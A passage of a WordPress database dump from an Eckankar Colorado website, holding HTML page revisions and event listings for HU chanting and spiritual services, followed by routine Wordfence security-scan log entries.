causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-weight: 600;\" data-font-weight=\"600\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-21 09:31:13','2023-11-21 16:31:13','',7160,'https://eckankar-colorado.org/?p=269413',0,'revision','',0),(269414,15,'2023-11-21 09:35:08','2023-11-21 16:35:08','','Butterfly2','','inherit','closed','closed','','butterfly2','','','2023-11-21 09:35:08','2023-11-21 16:35:08','',269412,'https://eckankar-colorado.org/wp-content/uploads/2023/11/Butterfly2.webp',0,'attachment','image/webp',0),(269415,15,'2023-11-21 09:40:31','2023-11-21 16:40:31','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How Can I Listen to Divine Guidance?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\r\n</li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','How Can I Listen to Divine Guidance?','','inherit','closed','closed','','269412-autosave-v1','','','2023-11-21 09:40:31','2023-11-21 16:40:31','',269412,'https://eckankar-colorado.org/?p=269415',0,'revision','',0),(269416,15,'2023-11-21 09:49:23','2023-11-21 16:49:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Experience HU, the Sound of Soul<br>\r\n</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, an ancient mantra and divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU for 15 to 20 minutes, have a few minutes of quiet contemplation followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/297480934/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Opening Your Heart to Divine Love','','publish','closed','closed','','opening-your-heart-to-divine-love','','','2023-11-21 09:49:23','2023-11-21 16:49:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269416',0,'mec-events','',0),(269417,15,'2023-11-21 09:48:13','2023-11-21 16:48:13','','GoldenHU','','inherit','closed','closed','','goldenhu-2','','','2023-11-21 09:48:13','2023-11-21 16:48:13','',269416,'https://eckankar-colorado.org/wp-content/uploads/2023/11/GoldenHU.webp',0,'attachment','image/webp',0);
/*!40000 ALTER TABLE `wpcl_posts` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_posts` with 2440 row(s)
--

--
-- Table structure for table `wpcl_wfstatus`
--

DROP TABLE IF EXISTS `wpcl_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=185359 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfstatus`
--

LOCK TABLES `wpcl_wfstatus` WRITE;
/*!40000 ALTER TABLE `wpcl_wfstatus` DISABLE KEYS */;
INSERT INTO `wpcl_wfstatus` VALUES (185238,1700415161.476822,2,'info','Scanned contents of 3471 additional files at 56.58 per second'),(185235,1700415158.454729,2,'info','Scanned contents of 3178 additional files at 54.48 per second'),(185236,1700415159.463421,2,'info','Scanned contents of 3274 additional files at 55.18 per second'),(185237,1700415160.467038,2,'info','Scanned contents of 3375 additional files at 55.93 per second'),(185160,1700415098.284108,2,'info','Analyzed 16700 files containing 240.12 MB of data so far'),(185071,1700415091.448535,2,'info','Analyzed 7800 files containing 83.86 MB of data so far'),(185223,1700415146.300911,2,'info','Scanned contents of 2170 additional files at 46.99 per second'),(185224,1700415147.325715,2,'info','Scanned contents of 2251 additional files at 47.69 per second'),(185225,1700415148.329856,2,'info','Scanned contents of 2338 additional files at 48.50 per second'),(185226,1700415149.364819,2,'info','Scanned contents of 2409 additional files at 48.92 per second'),(185227,1700415150.373873,2,'info','Scanned contents of 2479 additional files at 49.33 per second'),(185169,1700415099.307668,2,'info','Analyzed 17600 files containing 275.44 MB of data so far'),(185119,1700415095.254209,2,'info','Analyzed 12600 files containing 172.54 MB of data so far'),(185013,1700415087.582769,2,'info','Analyzed 2000 files containing 26.05 MB of data so far'),(185014,1700415087.629377,2,'info','Analyzed 2100 files containing 26.43 MB of data so far'),(185015,1700415087.691468,2,'info','Analyzed 2200 files containing 26.96 MB of data so far'),(185016,1700415087.742582,2,'info','Analyzed 2300 files containing 27.43 MB of data so far'),(185358,1700583187.219362,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.'),(184920,1700410266.915249,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(184916,1700410266.903650,1,'info','Initiating quick scan'),(184917,1700410266.905347,10,'info','SUM_START:Checking Web Application Firewall status'),(184918,1700410266.905595,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(184919,1700410266.907767,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(184912,1700324440.608940,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(184913,1700324440.614702,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(185251,1700415174.593259,2,'info','Scanned contents of 4681 additional files at 62.86 per second'),(185252,1700415175.655202,2,'info','Scanned contents of 4773 additional files at 63.19 per second'),(184939,1700415084.764195,10,'info','SUM_START:Checking for future GeoIP support'),(184940,1700415084.765752,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(184941,1700415084.769058,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(184942,1700415084.771640,10,'info','SUM_ENDBAD:Checking for paths skipped due to scan settings'),(184943,1700415084.774083,2,'info','Getting plugin list from WordPress'),(184944,1700415084.775081,2,'info','Found 40 plugins'),(184945,1700415084.775218,2,'info','Getting theme list from WordPress'),(184946,1700415084.775454,2,'info','Found 2 themes'),(184947,1700415084.781215,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(184948,1700415085.321078,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(184949,1700415085.323331,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(184950,1700415085.326070,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(184951,1700415085.328023,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(184952,1700415085.328917,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(184953,1700415085.330703,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(184954,1700415085.331882,10,'info','SUM_DISABLED:Skipping theme scan'),(184955,1700415085.332111,10,'info','SUM_DISABLED:Skipping plugin scan'),(184956,1700415085.333042,10,'info','SUM_START:Scanning for known malware files'),(184957,1700415085.334970,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(184958,1700415085.349824,2,'info','500 files indexed'),(184959,1700415085.366210,2,'info','1000 files indexed'),(184960,1700415085.387080,2,'info','1500 files indexed'),(184961,1700415085.404753,2,'info','2000 files indexed'),(184962,1700415085.422512,2,'info','2500 files indexed'),(184963,1700415085.433087,2,'info','3000 files indexed'),(184964,1700415085.445111,2,'info','3500 files indexed'),(184965,1700415085.456868,2,'info','4000 files indexed'),(184966,1700415085.479447,2,'info','4500 files indexed'),(184967,1700415085.494173,2,'info','5000 files indexed'),(184968,1700415085.509548,2,'info','5500 files indexed'),(184969,1700415085.524046,2,'info','6000 files indexed'),(184970,1700415085.539029,2,'info','6500 files indexed'),(184971,1700415085.553959,2,'info','7000 files indexed'),(184972,1700415085.570815,2,'info','7500 files indexed'),(184973,1700415085.591592,2,'info','8000 files indexed'),(184974,1700415085.603522,2,'info','8500 files indexed'),(184975,1700415085.622020,2,'info','9000 files indexed'),(184976,1700415085.639525,2,'info','9500 files indexed'),(184977,1700415085.651071,2,'info','10000 files indexed'),(184978,1700415085.661735,2,'info','10500 files indexed'),(184979,1700415085.673200,2,'info','11000 files indexed'),(184980,1700415085.685548,2,'info','11500 files indexed'),(184981,1700415085.697749,2,'info','12000 files indexed'),(184982,1700415085.708342,2,'info','12500 files indexed'),(184983,1700415085.720446,2,'info','13000 files indexed'),(184984,1700415085.732785,2,'info','13500 files indexed'),(184985,1700415085.743789,2,'info','14000 files indexed'),(184986,1700415085.773871,2,'info','14500 files indexed'),(184987,1700415085.944127,2,'info','15000 files indexed'),(184988,1700415085.953728,2,'info','15500 files indexed'),(184989,1700415085.964501,2,'info','16000 files indexed'),(184990,1700415085.974486,2,'info','16500 files indexed'),(184991,1700415085.984993,2,'info','17000 files indexed'),(184992,1700415085.996514,2,'info','17500 files indexed'),(184993,1700415085.999771,2,'info','17632 files indexed'),(184994,1700415086.085032,2,'info','Analyzed 100 files containing 1.8 MB of data so far'),(184995,1700415086.163096,2,'info','Analyzed 200 files containing 3.31 MB of data so far'),(184996,1700415086.237563,2,'info','Analyzed 300 files containing 3.94 MB of data so far'),(184997,1700415086.310601,2,'info','Analyzed 400 files containing 4.44 MB of data so far'),(184998,1700415086.373320,2,'info','Analyzed 500 files containing 5.05 MB of data so far'),(184999,1700415086.442011,2,'info','Analyzed 600 files containing 5.42 MB of data so far'),(185000,1700415086.556844,2,'info','Analyzed 700 files containing 7.22 MB of data so far'),(185001,1700415086.608560,2,'info','Analyzed 800 files containing 7.59 MB of data so far'),(185002,1700415086.658949,2,'info','Analyzed 900 files containing 8.03 MB of data so far'),(185003,1700415086.750777,2,'info','Analyzed 1000 files containing 10.09 MB of data so far'),(185004,1700415086.838269,2,'info','Analyzed 1100 files containing 11.98 MB of data so far'),(185005,1700415086.938218,2,'info','Analyzed 1200 files containing 15.03 MB of data so far'),(185006,1700415087.028497,2,'info','Analyzed 1300 files containing 17.2 MB of data so far'),(185007,1700415087.139665,2,'info','Analyzed 1400 files containing 19.6 MB of data so far'),(185008,1700415087.224871,2,'info','Analyzed 1500 files containing 21.7 MB of data so far'),(185009,1700415087.330736,2,'info','Analyzed 1600 files containing 23.79 MB of data so far'),(185010,1700415087.423387,2,'info','Analyzed 1700 files containing 24.98 MB of data so far'),(185247,1700415170.572498,2,'info','Scanned contents of 4281 additional files at 60.77 per second'),(185246,1700415169.556905,2,'info','Scanned contents of 4251 additional files at 61.23 per second'),(185183,1700415105.208732,2,'info','Scanned contents of 301 additional files at 59.21 per second'),(185184,1700415106.222318,2,'info','Scanned contents of 355 additional files at 58.23 per second'),(185185,1700415107.236794,2,'info','Scanned contents of 424 additional files at 59.62 per second'),(185186,1700415108.250953,2,'info','Scanned contents of 491 additional files at 60.43 per second'),(185187,1700415109.256798,2,'info','Scanned contents of 532 additional files at 58.26 per second'),(185188,1700415110.259189,2,'info','Scanned contents of 603 additional files at 59.50 per second'),(185189,1700415111.259708,2,'info','Scanned contents of 650 additional files at 58.38 per second'),(185190,1700415112.263392,2,'info','Scanned contents of 720 additional files at 59.32 per second'),(185042,1700415089.700019,2,'info','Analyzed 4900 files containing 66.13 MB of data so far'),(185043,1700415089.771995,2,'info','Analyzed 5000 files containing 66.7 MB of data so far'),(185044,1700415089.842238,2,'info','Analyzed 5100 files containing 67.13 MB of data so far'),(185045,1700415089.905490,2,'info','Analyzed 5200 files containing 67.54 MB of data so far'),(185046,1700415089.964103,2,'info','Analyzed 5300 files containing 68.1 MB of data so far'),(185047,1700415090.023070,2,'info','Analyzed 5400 files containing 68.62 MB of data so far'),(185048,1700415090.081008,2,'info','Analyzed 5500 files containing 69.1 MB of data so far'),(185049,1700415090.136898,2,'info','Analyzed 5600 files containing 69.48 MB of data so far'),(185050,1700415090.191309,2,'info','Analyzed 5700 files containing 69.85 MB of data so far'),(185051,1700415090.248661,2,'info','Analyzed 5800 files containing 70.33 MB of data so far'),(185052,1700415090.308092,2,'info','Analyzed 5900 files containing 70.74 MB of data so far'),(185053,1700415090.363102,2,'info','Analyzed 6000 files containing 71.17 MB of data so far'),(185054,1700415090.424703,2,'info','Analyzed 6100 files containing 71.59 MB of data so far'),(184914,1700324440.614920,10,'info','SUM_FINAL:Scan complete. You have 3 new issues to fix. See below.'),(185241,1700415164.529759,2,'info','Scanned contents of 3751 additional files at 58.24 per second'),(185240,1700415163.522436,2,'info','Scanned contents of 3646 additional files at 57.51 per second'),(185239,1700415162.495035,2,'info','Scanned contents of 3567 additional files at 57.19 per second'),(185020,1700415087.963435,2,'info','Analyzed 2700 files containing 29.56 MB of data so far'),(184915,1700410266.901527,10,'info','SUM_PREP:Preparing a new scan.'),(185222,1700415145.300614,2,'info','Scanned contents of 2148 additional files at 47.55 per second'),(185221,1700415144.282630,2,'info','Scanned contents of 2110 additional files at 47.78 per second'),(185220,1700415143.271278,2,'info','Scanned contents of 2082 additional files at 48.25 per second'),(185219,1700415142.256095,2,'info','Scanned contents of 2059 additional files at 48.87 per second'),(185202,1700415124.553907,2,'info','Scanned contents of 1421 additional files at 58.17 per second'),(185201,1700415123.411351,2,'info','Scanned contents of 1385 additional files at 59.48 per second'),(185200,1700415122.382034,2,'info','Scanned contents of 1329 additional files at 59.71 per second'),(185199,1700415121.374327,2,'info','Scanned contents of 1274 additional files at 59.96 per second'),(185198,1700415120.339508,2,'info','Scanned contents of 1214 additional files at 60.06 per second'),(185197,1700415119.334063,2,'info','Scanned contents of 1140 additional files at 59.35 per second'),(185196,1700415118.326811,2,'info','Scanned contents of 1065 additional files at 58.51 per second'),(185195,1700415117.319310,2,'info','Scanned contents of 999 additional files at 58.10 per second'),(185194,1700415116.315286,2,'info','Scanned contents of 954 additional files at 58.93 per second'),(185193,1700415115.308848,2,'info','Scanned contents of 892 additional files at 58.75 per second'),(185192,1700415114.272215,2,'info','Scanned contents of 846 additional files at 59.80 per second'),(185191,1700415113.268521,2,'info','Scanned contents of 782 additional files at 59.50 per second'),(185245,1700415168.547332,2,'info','Scanned contents of 4156 additional files at 60.74 per second'),(185244,1700415167.543435,2,'info','Scanned contents of 4056 additional files at 60.16 per second'),(185243,1700415166.540652,2,'info','Scanned contents of 3955 additional files at 59.55 per second'),(185242,1700415165.539815,2,'info','Scanned contents of 3861 additional files at 59.02 per second'),(185140,1700415096.862518,2,'info','Analyzed 14700 files containing 214.55 MB of data so far'),(185141,1700415096.912987,2,'info','Analyzed 14800 